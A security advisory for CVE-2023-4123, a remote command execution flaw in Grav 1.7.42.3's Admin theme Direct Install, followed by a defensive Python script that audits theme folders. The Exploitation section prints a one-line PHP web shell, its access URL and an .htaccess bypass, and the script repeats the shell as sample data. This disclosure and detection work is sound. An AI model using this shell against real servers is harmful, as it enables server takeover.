grav 1.7.42.3 - Remote Command Execution

Summary

Name: grav 1.7.42.3 - Remote Command Execution
Code name:
Product: grav 1.7.42.3
Affected versions: Version 1.7.42.3
State: Private
Release date: 2023-08-11

Vulnerability

Kind: Remote Command Execution
Rule:
Remote: Yes
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C
CVSSv3.1 Base Score: 8.0
Exploit available: Yes
CVE ID(s): CVE-2023-4123

Description

Grav allows an Admin panel user to execute commands on the server by abusing the manual theme install (Direct Install) functionality.

Vulnerability

A Remote Command Execution (RCE) vulnerability has been identified in Grav. An admin user, or a user with Super User privileges, can upload theme packages manually through the Admin panel. This functionality does not check the integrity of the package or perform any other validation of its contents, so the uploaded theme can carry a PHP web shell. Grav's default configuration prevents PHP files under the themes folder from being executed, so the package also ships its own .htaccess file in the folder that holds the shell in order to bypass that restriction. That bypass only works where the web server honours .htaccess files for the path (Apache with AllowOverride enabled); the lack of validation on the upload itself does not depend on the web server.


Exploitation

In the Grav Admin panel, go to Tools -> Direct Install and upload the theme package containing the payload:

<?php $cmd=$_GET['cmd']; system($cmd); ?>


After the upload, the shell is reachable through the theme's public path:

server/user/themes/material-lite/images/poc.php?cmd=whoami
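Since no patch exists and the procedure above leaves file-system artifacts (a PHP file under a theme's images folder and a .htaccess next to it), a defender can audit user/themes for exactly those. The script below is an added example written for this page, not Grav's own code or Fluid Attacks' PoC: it builds a constructed sample tree mirroring the path used above, then flags PHP files below a theme's top level, .htaccess files inside any theme, and PHP sources where a request parameter reaches a command-execution builtin. The layout it assumes (a theme's own PHP class file at its top level, nothing else in PHP) and the sample file contents are assumptions, not taken from the page.

```python
"""Audit a Grav user/themes tree for artifacts of the Direct Install abuse.

Added example for this advisory; not Grav's code. The sample tree and file
contents in build_sample_tree() are constructed for illustration.
"""
import os
import re
import tempfile

# Shape of the web shell used in the PoC above: request input flowing into a
# command-execution builtin. Both must be present to count as a hit.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
COMMAND_SINK = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")


def scan_php_source(source: str) -> bool:
    """True when a PHP source takes request input and reaches a command sink."""
    return bool(REQUEST_INPUT.search(source) and COMMAND_SINK.search(source))


def audit_themes(themes_dir: str):
    """Walk <grav-root>/user/themes and return (reason, relative_path) findings.

    reasons:
      php-outside-theme-root  PHP file below a theme's top-level directory
                              (assumption: stock themes keep PHP at the root)
      webshell-pattern        PHP source matching the request -> command shape
      htaccess-in-theme       .htaccess shipped inside a theme directory
    """
    findings = []
    for theme in sorted(os.listdir(themes_dir)):
        theme_root = os.path.join(themes_dir, theme)
        if not os.path.isdir(theme_root):
            continue
        for dirpath, _dirs, files in os.walk(theme_root):
            for name in files:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, themes_dir).replace(os.sep, "/")
                if name == ".htaccess":
                    findings.append(("htaccess-in-theme", rel))
                if name.lower().endswith(".php"):
                    if dirpath != theme_root:
                        findings.append(("php-outside-theme-root", rel))
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        if scan_php_source(fh.read()):
                            findings.append(("webshell-pattern", rel))
    return findings


def build_sample_tree() -> str:
    """Constructed sample install (not a real Grav tree) mirroring the PoC path."""
    root = tempfile.mkdtemp(prefix="grav-audit-")
    theme = os.path.join(root, "user", "themes", "material-lite")
    os.makedirs(os.path.join(theme, "images"))
    samples = {
        # Legitimate-looking theme root files (contents simplified, assumed).
        os.path.join(theme, "blueprints.yaml"): "name: Material Lite\ntype: theme\n",
        os.path.join(theme, "material-lite.php"):
            "<?php\nnamespace Grav\\Theme;\nuse Grav\\Common\\Theme;\n"
            "class MaterialLite extends Theme {}\n",
        # The artifacts the exploit leaves behind: the shell and its override.
        os.path.join(theme, "images", "poc.php"):
            "<?php $cmd=$_GET['cmd']; system($cmd); ?>\n",
        os.path.join(theme, "images", ".htaccess"):
            "# constructed placeholder; any .htaccess inside a theme is flagged\n",
    }
    for path, content in samples.items():
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def audit_sample():
    """Build the constructed tree and audit it; returns the set of findings."""
    root = build_sample_tree()
    return set(audit_themes(os.path.join(root, "user", "themes")))


if __name__ == "__main__":
    for reason, path in sorted(audit_sample()):
        print(f"{reason:24s} {path}")
```

Run it against a real install by pointing audit_themes() at <grav-root>/user/themes. A legitimate theme trips none of the three checks, while the PoC shell trips all three at once, which is a stronger signal than any single one; review the top-level-PHP assumption against any custom theme that keeps classes in subdirectories before acting on php-outside-theme-root alone.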


Our security policy

We have reserved the ID CVE-2023-4123 to refer to this issue from now on.

System Information

  • Version: grav 1.7.42.3

  • Operating System: Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Ronald Hernandez from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/getgrav/grav

Timeline

2023-07-26: Vulnerability discovered.

2023-07-26: Vendor contacted.

2023-08-11: Public disclosure.
